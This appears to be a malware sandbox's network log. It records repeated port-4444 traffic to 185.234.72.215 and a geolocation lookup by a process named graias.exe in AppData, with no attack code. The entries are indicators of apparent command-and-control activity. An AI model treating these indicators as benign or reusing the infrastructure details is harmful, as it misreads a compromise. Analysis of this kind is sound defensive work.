                                                                                                                                                                                                                                          Jan 4, 2025 00:02:54.019017935 CET444449913185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:54.191952944 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:54.234733105 CET499094444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:54.239660978 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:54.239674091 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:54.239690065 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:54.239698887 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:54.239726067 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:54.239733934 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:54.239811897 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:54.239820957 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:54.239877939 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:54.239886999 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:54.239897966 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:54.239923954 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:54.239974976 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:54.239984035 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:54.240060091 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:54.240087032 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:54.240103006 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:54.240129948 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:54.240181923 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:54.240190029 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:54.240210056 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:54.240272999 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:54.240282059 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:54.240292072 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:54.240307093 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:54.240315914 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:54.795597076 CET444449947185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:54.796904087 CET499474444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:54.803596973 CET444449947185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:54.803725004 CET444449947185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:55.095633984 CET499134444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:55.095973969 CET499084444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:55.186991930 CET444449913185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:55.187012911 CET444449908185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:58.791198969 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:58.791238070 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:58.791285038 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:58.791333914 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:58.791346073 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:59.357841969 CET499134444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:59.362839937 CET444449913185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:59.406932116 CET499084444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:59.412921906 CET444449908185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:59.586216927 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:59.651690006 CET499094444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:59.720093966 CET499094444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:59.724994898 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:59.725008011 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:59.725047112 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:59.725061893 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:59.725086927 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:59.725095034 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:59.725153923 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:59.725164890 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:59.725208044 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:59.725217104 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:59.725296021 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:59.725303888 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:59.725312948 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:59.725353003 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:59.725362062 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:59.725394964 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:59.725472927 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:59.725553036 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:59.725723028 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:59.725733042 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:59.725742102 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:59.980894089 CET444449947185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:59.988807917 CET499474444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:59.993617058 CET444449947185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:59.993766069 CET444449947185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:00.363373995 CET499134444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:00.368268013 CET444449913185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:00.413578987 CET499084444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:00.418358088 CET444449908185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:00.591758966 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:00.661313057 CET499094444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:00.666209936 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:00.666229963 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:00.666248083 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:00.666351080 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:00.666359901 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:00.666408062 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:00.666419029 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:00.666507959 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:00.666516066 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:00.666568041 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:00.666575909 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:00.666585922 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:00.666656017 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:00.666703939 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:00.666712999 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:00.666748047 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:00.666799068 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:00.666896105 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:00.666903973 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:01.804646015 CET4434998113.107.246.67192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:01.804723978 CET4434998113.107.246.67192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:01.805236101 CET49981443192.168.2.413.107.246.67
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:01.819993973 CET499134444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:01.820178032 CET499084444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:01.824759960 CET444449913185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:01.824975014 CET444449908185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:02.035979986 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:02.151294947 CET499094444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:02.152201891 CET444449947185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:02.156171083 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:02.156179905 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:02.156191111 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:02.156207085 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:02.156260967 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:02.156274080 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:02.156344891 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:02.156353951 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:02.156367064 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:02.156377077 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:02.156420946 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:02.156430006 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:02.156485081 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:02.156492949 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:02.156502962 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:02.156511068 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:02.156536102 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:02.156570911 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:02.156656027 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:02.156733036 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:06.189651012 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:06.189660072 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:06.189697027 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:06.189701080 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:06.189778090 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:06.189785957 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:06.189827919 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:06.189836025 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:06.189898014 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:06.189920902 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:06.190001965 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:06.190011024 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:06.190052986 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:07.108309984 CET499084444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:07.113152027 CET444449908185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:07.285769939 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:07.328612089 CET499094444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:07.333589077 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:07.333653927 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:07.333739042 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:07.333748102 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:07.333802938 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:07.333811045 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:07.333846092 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:07.333899021 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:07.333908081 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:07.333916903 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:07.333933115 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:07.333946943 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:07.333978891 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:07.333991051 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:07.334017992 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:07.334026098 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:07.334140062 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:07.334148884 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:08.249596119 CET4972480192.168.2.4199.232.214.172
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:08.254617929 CET8049724199.232.214.172192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:08.254661083 CET4972480192.168.2.4199.232.214.172
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:08.298437119 CET499084444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:08.303275108 CET444449908185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:08.487894058 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:08.540798903 CET499094444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:08.569680929 CET499094444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:08.574515104 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:08.574573040 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:08.574583054 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:08.574599028 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:08.574610949 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:08.574621916 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:08.574630976 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:08.574677944 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:08.574704885 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:08.574722052 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:08.574732065 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:08.574742079 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:08.574820995 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:08.574830055 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:08.574839115 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:08.574846983 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:08.574915886 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:09.304662943 CET499084444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:09.309555054 CET444449908185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:09.489834070 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:09.651576042 CET499094444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:09.909264088 CET499094444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:09.914241076 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:09.914253950 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:09.914271116 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:09.914279938 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:09.914290905 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:09.914319992 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:09.914330006 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:09.914361000 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:09.914401054 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:09.914460897 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:09.914469004 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:09.914477110 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:09.914514065 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:09.914522886 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:09.914554119 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:09.914561987 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:09.914773941 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:09.989321947 CET444449733185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:10.107521057 CET497334444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:10.259654045 CET499084444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:10.264575005 CET444449908185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:10.437963009 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:10.511320114 CET499094444192.168.2.4185.234.72.215
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:10.517227888 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:10.517240047 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:10.517250061 CET444449909185.234.72.215192.168.2.4
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:10.517282963 CET444449909185.234.72.215192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source IP | Dest IP | Checksum | Code | Type
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:17.597938061 CET1.1.1.1192.168.2.40x6bc5No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:20.690104008 CET1.1.1.1192.168.2.40xf9e5No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:20.705367088 CET1.1.1.1192.168.2.40xbc6bNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:56.725841045 CET1.1.1.1192.168.2.40xe39No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:02:56.725841045 CET1.1.1.1192.168.2.40xe39No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:16.035183907 CET1.1.1.1192.168.2.40x2007No error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:16.038311005 CET1.1.1.1192.168.2.40x69acNo error (0)mdec.nelreports.netmdec.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:20.184211016 CET1.1.1.1192.168.2.40xf4d9No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:20.184211016 CET1.1.1.1192.168.2.40xf4d9No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:52.321527958 CET1.1.1.1192.168.2.40x6f0fNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                          Jan 4, 2025 00:03:52.321527958 CET1.1.1.1192.168.2.40x6f0fNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49735 | 178.237.33.50 | 80 | 7188 | C:\Users\user\AppData\Roaming\Graias\graias.exe

Timestamp | Bytes transferred | Direction | Data
Jan 4, 2025 00:02:02.551342964 CET | 71 | OUT | GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
Jan 4, 2025 00:02:03.166555882 CET | 1171 | IN | HTTP/1.1 200 OK
date: Fri, 03 Jan 2025 23:02:03 GMT
server: Apache
content-length: 963
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
Data Ascii: { "geoplugin_request":"8.46.123.189", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49751 | 13.107.246.67 | 443 | 7744 | C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-03 23:02:10 UTC | 549 | OUT | GET /scripts/c/ms.jsll-4.min.js HTTP/1.1
Host: js.monitor.azure.com
Connection: keep-alive
sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
Accept: */*
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
Referer: https://learn.microsoft.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2025-01-03 23:02:10 UTC | 889 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 23:02:10 GMT
Content-Type: text/javascript; charset=utf-8
Content-Length: 207935
Connection: close
Vary: Accept-Encoding
Cache-Control: no-transform, public, max-age=1800, immutable
Last-Modified: Mon, 14 Oct 2024 17:27:31 GMT
ETag: 0x8DCEC757C1AD1D1
x-ms-request-id: 275be117-b01e-0006-4a05-581325000000
